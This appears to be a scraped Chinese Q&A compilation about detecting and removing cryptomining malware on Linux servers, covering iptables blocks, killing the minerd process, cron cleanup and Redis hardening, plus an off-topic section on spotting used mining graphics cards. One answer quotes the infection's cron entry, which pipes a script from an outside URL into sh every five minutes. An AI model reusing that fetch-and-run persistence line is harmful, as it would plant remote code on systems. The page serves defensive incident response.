服务器看是否被挖矿
⑴ 请教大神,服务器被挖矿程序入侵如何排插
传一个SHELL到服务器上去,都有特征码的,很容易查出来
⑵ 求助服务器被挖矿程序入侵,如何排查
新客户于最近向我们SINE安全公司咨询,说他的服务器经常卡的网站无法打开,远程连接
服务器的慢的要命,有时候PING值都达到300-500之间,还经常掉包,听客户这么一说,一般
会判断为受到了CC+DDOS混合流量攻击,再具体一问,说是机房那面没有受到流量攻击,这
就有点奇怪了,不是流量攻击,还导致服务器卡,网站无法打开,这是什么攻击?为了解决客
户服务器卡的问题,我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。
挖矿木马还设计了挖矿进程如果被客户强制停止后,会自动启动继续挖矿,达到不间断的挖矿,
仔细检查发现是通过设置了每个小时执行任务计划,远程下载shell挖矿木马,然后执行,检查
当前进程是否存在,不存在就启动挖矿木马,进行挖矿。
对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据,以及感染蠕虫的病
毒,如果数据被加密那损失大了,客户是做平台的,里面的客户数据很重要,找出挖矿木马后,
客户需要知道服务器到底是如何被攻击的? 被上传挖矿木马的? 防止后期再出现这样的攻击
状况。
通过我们安全工程师的安全检测与分析,发现该服务器使用的是apache tomcat环境,平台的开
发架构是JSP+oracle数据库,apache tomcat使用的是2016年的版本,导致该apache存在严重
的远程执行命令漏洞,入侵者可以通过该漏洞直接入侵服务器,拿到服务器的管理员权限,
SINE安全工程师立即对apache 漏洞进行修复,并清除木马,至此问题得以解决,客户服务器
一切稳定运行,网站打开正常。
⑶ 挖矿是云服务器好还是物理服务器好
挖矿需要耗费大量服务器资源,对服务器配置要求比较高。物理服务器相对好些。云服务器相当于物理服务器划分出来的子服务器。
⑷ 怎么检查自己电脑有没有被人用来挖矿,比特币
挖矿都是烧的显卡,以下方法可以鉴定自己显卡是不是矿卡
1:通过肉眼来识别这个硬件究竟是不是矿卡 ,其实通过其他方式也可以测出,就比如说你到电脑里面去测矿卡的超频性能,去跟官方的数据进行对比,测矿卡供电的稳定性,也可以测出来是不是矿卡。
2:第一点是先看矿卡上面有没有什么特别脏特别多的灰尘,各种油渍,如果没有的话那证明卖家可能做了比较好的处理,或者不是矿卡。如果矿卡非常的脏的话,十有八九就是矿卡,那我们就要进行下一步的操作,就是拆开矿卡。
3:我们应该注意到是否有发票且带保修,保修基本是在全国各地的保修点都可以保修的,这种才不是矿卡。
(4)服务器看是否被挖矿扩展阅读
如何避免买到矿卡:尽量到淘宝京东的官方旗舰店买新卡,图便宜买二手显卡的话就不敢保证了。
如果实在预算有限,一定要购买二手显卡的话,也要尽量选择个人购买,切勿相信什么网吧倒闭,工作室或者公司倒闭,这种渠道大部分买过来的大部分都是矿卡,当然如果那个个人买家手里也有大量的显卡卖的话,那也要请谨慎对待,这种大概率也是矿卡。最后,也希望大家可以避免矿卡,买到自己心仪的显卡,开心游戏。
⑸ 阿里云服务器被挖矿了怎么办(纯纯电脑小白
1. 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
2. chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3. pkill minerd ,杀掉进程
4. service stop crond 或者 crontab -r 删除所有的执行计划
5. 执行top,查看了一会,没有再发现minerd 进程了。
6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blog.jobbole.com/94518/然后就注入了病毒,下面是解决办法和清除工作:
1. 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号
3. 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉.
⑹ 服务器被下挖矿了怎么办
哥们被下了啥挖矿?去举报啊。之前流量矿石非常火的时候,我的服务器也被无良黑了,成了肉鸡,然后我去找到他的信息,截图跟流量矿石举报,就帮我处理了。你看你的被下了啥,就去找他们处理。
⑺ 如何用Linux服务器挖矿教程
今天早上起来一看,服务器脚本一个都没有启动!甚是奇怪,远程登录服务器,也是异常的卡,直到最后卡死,只好重新启动服务器!
启动之后没一会又会变卡,越来越卡,top查看进程!不觉又奇怪的进程,因为平常也不经常看!所以自己也搞不明白怎么回事儿!只好到群里问了问,说是被挖矿的挂了木马文件了,是由于redis的漏洞!
后来我自己发现,原来redis远程可以直接登录,原以为redis和mysql不开放登录权限就不会支持远程登录呢,看来是我想多了
看了好长时间才发现一个异常的进程,自启的进程 molibe !
找到进程位置 ps -ef|grep molibe ;
在tmp目录下,打开一看的确是有
chmod -x molibe 取消执行权限在来到/var/spool/cron下,cat root 查看定时器的执行发现之前脚本都被改了,顾不得删除cron,service crond restart 重新启动,再有就时kill 掉molibe进程
这样大概整个就结束了!但是根本是因为redis漏洞,所以还是补上吧
首先修改redis'端口,找到redis.conf文件 port **** 修改端口号再有就是必须修改密码 # requirepass ******** 去除#号重新启动 /redis/src/redis-server /redis/redis-conf
启动成功之后
redis/redis-cli -p ****(端口) -a *****(密码)